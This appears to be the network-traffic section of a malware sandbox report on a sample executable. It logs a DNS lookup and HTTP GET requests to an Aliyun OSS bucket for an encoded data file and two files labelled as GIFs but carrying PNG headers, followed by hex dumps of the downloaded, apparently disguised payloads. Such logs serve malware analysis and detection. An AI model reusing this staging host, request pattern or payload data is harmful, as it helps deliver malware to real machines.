                                Jan 8, 2025 10:11:38.179415941 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.179426908 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.179476976 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.181154013 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.181222916 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.185020924 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.185097933 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.266140938 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.266227961 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.266344070 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.266395092 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.266417027 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.266464949 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.266470909 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.266488075 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.266509056 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.266539097 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.266716957 CET49976443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.266726971 CET4434997659.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.280632019 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.280678988 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:38.280762911 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.280968904 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:38.280982971 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.508985996 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.509052992 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.509504080 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.509516001 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.509691000 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.509696007 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.843849897 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.843874931 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.843914986 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.843950987 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.843965054 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.843992949 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.844199896 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.844248056 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.844254017 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.844293118 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.844419956 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.844456911 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.844465017 CET4434997759.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:39.844507933 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.849385977 CET49977443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:39.849405050 CET4434997759.110.190.44192.168.2.6
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 8, 2025 10:11:20.578902960 CET5584353192.168.2.61.1.1.1
                                Jan 8, 2025 10:11:20.851120949 CET53558431.1.1.1192.168.2.6
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jan 8, 2025 10:11:20.578902960 CET192.168.2.61.1.1.10xfc3Standard query (0)basdy1.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jan 8, 2025 10:11:20.851120949 CET1.1.1.1192.168.2.60xfc3No error (0)basdy1.oss-cn-beijing.aliyuncs.com59.110.190.44A (IP address)IN (0x0001)false
                                • basdy1.oss-cn-beijing.aliyuncs.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.64997159.110.190.444436208C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                TimestampBytes transferredDirectionData
                                2025-01-08 09:11:22 UTC111OUTGET /i.dat HTTP/1.1
                                User-Agent: GetData
                                Host: basdy1.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-08 09:11:22 UTC557INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Wed, 08 Jan 2025 09:11:22 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 512
                                Connection: close
                                x-oss-request-id: 677E413A820F3F323028E151
                                Accept-Ranges: bytes
                                ETag: "D71E7AEE9700E286B3E41BD7F8F6E256"
                                Last-Modified: Wed, 08 Jan 2025 03:44:10 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 9133562984707339803
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000113
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: 1x567pcA4oaz5BvX+PbiVg==
                                x-oss-server-time: 4
                                2025-01-08 09:11:22 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 52 51 43 54 2d 65 7a 3b 48 48 16 58 36 75 3a 3d 54 57 54 53 34 7d 32 3f 56 46 4a 51 32 22 7f 32 5d 5f 1d 53 7d 34 3a 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 5d 41 41 45 36 7f 6a 6a 08 0b 19 0e 77 3f 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 51 52 40 57 2e 66 79 38 4b 4b 15 5b 35 76 39 3e 57 54 57 50 37 7e 31 3c 55 45 49 52 31 21 7c 31 5e 5c 1e 52 7c 35 3b 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 5c 40 40 44 37 7e 6b 6b 09 0a 18 0f 76 3e 21
                                Data Ascii: l%00RQCT-ez;HHX6u:=TWTS4}2?VFJQ2"2]_S}4:555555555555555555555555555555555]AAE6jjw? aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33QR@W.fy8KK[5v9>WTWP7~1<UEIR1!|1^\R|5;444444444444444444444444444444444\@@D7~kkv>!


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.64997259.110.190.444436208C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                TimestampBytes transferredDirectionData
                                2025-01-08 09:11:23 UTC111OUTGET /a.gif HTTP/1.1
                                User-Agent: GetData
                                Host: basdy1.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-08 09:11:24 UTC546INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Wed, 08 Jan 2025 09:11:23 GMT
                                Content-Type: image/gif
                                Content-Length: 135589
                                Connection: close
                                x-oss-request-id: 677E413B7A62AC3332C62997
                                Accept-Ranges: bytes
                                ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                Last-Modified: Wed, 08 Jan 2025 03:41:26 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 8642451798640735006
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                x-oss-server-time: 34
                                2025-01-08 09:11:24 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-08 09:11:24 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                2025-01-08 09:11:24 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                2025-01-08 09:11:24 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                2025-01-08 09:11:24 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                2025-01-08 09:11:24 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                2025-01-08 09:11:24 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                2025-01-08 09:11:24 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                2025-01-08 09:11:24 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                2025-01-08 09:11:24 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.64997359.110.190.444436208C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                TimestampBytes transferredDirectionData
                                2025-01-08 09:11:25 UTC111OUTGET /b.gif HTTP/1.1
                                User-Agent: GetData
                                Host: basdy1.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-08 09:11:26 UTC547INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Wed, 08 Jan 2025 09:11:25 GMT
                                Content-Type: image/gif
                                Content-Length: 125333
                                Connection: close
                                x-oss-request-id: 677E413D7A62AC3334E03197
                                Accept-Ranges: bytes
                                ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                Last-Modified: Wed, 08 Jan 2025 03:41:25 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 10333201072197591521
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                x-oss-server-time: 27
                                2025-01-08 09:11:26 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-08 09:11:26 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                2025-01-08 09:11:26 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
